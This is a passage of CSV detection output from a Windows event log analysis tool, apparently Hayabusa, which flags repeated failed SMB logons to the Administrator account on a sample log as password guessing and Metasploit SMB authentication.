Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
